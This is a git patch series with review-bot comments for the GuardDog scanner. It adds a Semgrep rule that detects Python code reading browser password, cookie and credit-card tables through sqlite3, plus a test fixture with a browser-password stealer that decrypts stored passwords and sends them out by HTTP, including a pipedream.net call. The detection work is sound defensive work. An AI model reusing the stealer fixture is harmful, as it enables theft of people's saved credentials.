From 18c4539b8e2538b366edf6c03a9b2f18a1a4fc43 Mon Sep 17 00:00:00 2001 From: Ian Kretz <44385082+ikretz@users.noreply.github.com> Date: Thu, 18 Jul 2024 09:35:49 +0200 Subject: [PATCH 1/3] Add Python sqlite3 data exfiltration rule coverage --- .../sourcecode/exfiltrate-sensitive-data.yml | 14 ++++++++++++ .../sourcecode/exfiltrate-sensitive-data.py | 22 +++++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml index 81887d68..20ed3607 100644 --- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml @@ -31,6 +31,19 @@ rules: - metavariable-regex: metavariable: $ENVVAR regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\']) + - patterns: + - pattern-inside: | + $CONNECT = sqlite3.connect(...) + ... + $CURSOR = $CONNECT.cursor(...) + ... + $CURSOR.close(...) + - pattern: $CURSOR.execute($QUERY, ...) + - metavariable-pattern: + metavariable: $QUERY + patterns: + - pattern: "..." + - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins] pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...) @@ -42,6 +55,7 @@ rules: - pattern-inside: $S = socket.socket(...); ... - pattern-inside: $S.connect(...); ... - pattern-inside: $S.send(...) + - pattern-inside: $F.write(...) languages: - python severity: WARNING diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py index 80021ad8..c5e9b9b3 100644 --- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py +++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py 
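Review bot: The sqlite3 source only binds a cursor obtained through `$CURSOR = $CONNECT.cursor(...)` on a connection bound by plain assignment, so the `Connection.execute(...)` shortcut (`conn.execute("SELECT ... FROM logins")`) and a connection opened as `with sqlite3.connect(...) as conn:` are, as far as I can tell, not matched even when the query text hits the regex. The later patches in this series keep the same `pattern-inside` shape, so the gap survives into the final rule. A second `pattern-either` alternative that stops at the connect() and matches `$CONNECT.execute($QUERY, ...)` would cover the shortcut without loosening the rest; the `with` form would need its own `pattern-inside` if Semgrep's assignment pattern does not already match the `as` binding, which is worth checking against the test file.
```yaml
      - patterns:
          - pattern-either:
              - patterns:
                  - pattern-inside: |
                      $CONNECT = sqlite3.connect(...)
                      ...
                      $CURSOR = $CONNECT.cursor(...)
                      ...
                  - pattern: $CURSOR.execute($QUERY, ...)
              - patterns:
                  - pattern-inside: |
                      $CONNECT = sqlite3.connect(...)
                      ...
                  - pattern: $CONNECT.execute($QUERY, ...)
          # … unchanged: metavariable-pattern on $QUERY …
```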
@@ -226,3 +226,25 @@ def run(self):
 ploads = {'hostname':hostname,'cwd':cwd,'username':username}
 # ruleid: exfiltrate-sensitive-data
 requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads)
+
+
+""" RULEID: sqlite3 data exfiltration
+"""
+
+def steal_passwords2(self, name: str, path: str, profile: str):
+ path = "path"
+ if not os.path.isfile(path):
+ return
+ loginvault = self.random_dir_create()
+ copy2(path, loginvault)
+ conn = sqlite3.connect(loginvault)
+ cursor = conn.cursor()
+ with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
+ for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
+ url, username, password = res
+ password = self.dcrpt_val(password, self.masterkey)
+ if url != "":
+ # ruleid: exfiltrate-sensitive-data
+ f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n")
+ cursor.close()
+ conn.close()
From 73dbe2b53b0276dd3a2d4c6f3a5081206db2b2ff Mon Sep 17 00:00:00 2001
From: Ian Kretz <44385082+ikretz@users.noreply.github.com>
Date: Thu, 18 Jul 2024 17:27:43 +0200
Subject: [PATCH 2/3] Incorporate change requests
---
 guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml | 4 +---
 tests/analyzer/sourcecode/exfiltrate-sensitive-data.py | 3 ++-
 2 files changed, 3 insertions(+), 4 deletions(-)
diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index 20ed3607..2ccbd175 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
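Review bot: The new fixture only exercises the positive case: the one sqlite3 query in `steal_passwords2` reads `logins` and its result reaches a sink, so nothing checks that a benign sqlite3 read — a query against a table outside the browser list, or one whose rows never reach a sink — stays quiet. An `# ok: exfiltrate-sensitive-data` counterpart beside this function, with the same connect/cursor shape, a query such as `SELECT id FROM settings`, and the rows sent the same way, would pin the rule's precision, which matters once the query regex is reduced to a bare table-name match later in this series. Separately, `path = "path"` on the second line overwrites the `path` parameter; harmless in a Semgrep fixture, but it reads as a leftover and deserves either a comment or dropping the parameter. The follow-up edit to this function in patch 2 leaves both points as they are.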
@@ -37,13 +37,12 @@ rules: ... $CURSOR = $CONNECT.cursor(...) ... - $CURSOR.close(...) - pattern: $CURSOR.execute($QUERY, ...) - metavariable-pattern: metavariable: $QUERY patterns: - pattern: "..." - - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins] + - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...) @@ -55,7 +54,6 @@ rules: - pattern-inside: $S = socket.socket(...); ... - pattern-inside: $S.connect(...); ... - pattern-inside: $S.send(...) - - pattern-inside: $F.write(...) languages: - python severity: WARNING diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py index c5e9b9b3..05ba1867 100644 --- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py +++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py @@ -244,7 +244,8 @@ def steal_passwords2(self, name: str, path: str, profile: str): url, username, password = res password = self.dcrpt_val(password, self.masterkey) if url != "": + params = {'url': url, 'username': username, 'password': password} # ruleid: exfiltrate-sensitive-data - f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n") + requests.get("https://example.com", params=params) cursor.close() conn.close() From c2cf5b1067b9119feb7dd9d8b5d43968e2eb0950 Mon Sep 17 00:00:00 2001 From: Ian Kretz <44385082+ikretz@users.noreply.github.com> Date: Thu, 18 Jul 2024 18:48:51 +0200 Subject: [PATCH 3/3] Match only on targeted table names --- guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml index 2ccbd175..605ee395 100644 --- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml @@ -42,7 +42,7 @@ rules: metavariable: $QUERY patterns: - pattern: "..." - - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) + - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...)
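Review bot: The new regex `(?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)` has no anchoring, so any query text containing one of these as a substring — a table like `user_logins_history` or a column like `cookies_enabled` — now satisfies the source, and a downstream sink match then flags it. Wrapping the alternation in word boundaries, `(?i)\b(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)\b`, keeps the intent of matching only the targeted table names while rejecting those substrings; since `_` is a word character, the `moz_*` entries are then no longer implied by the bare `cookies`/`logins` forms, so all six alternatives should stay. A negative case with such a substring in `tests/analyzer/sourcecode/exfiltrate-sensitive-data.py` would lock the behaviour in.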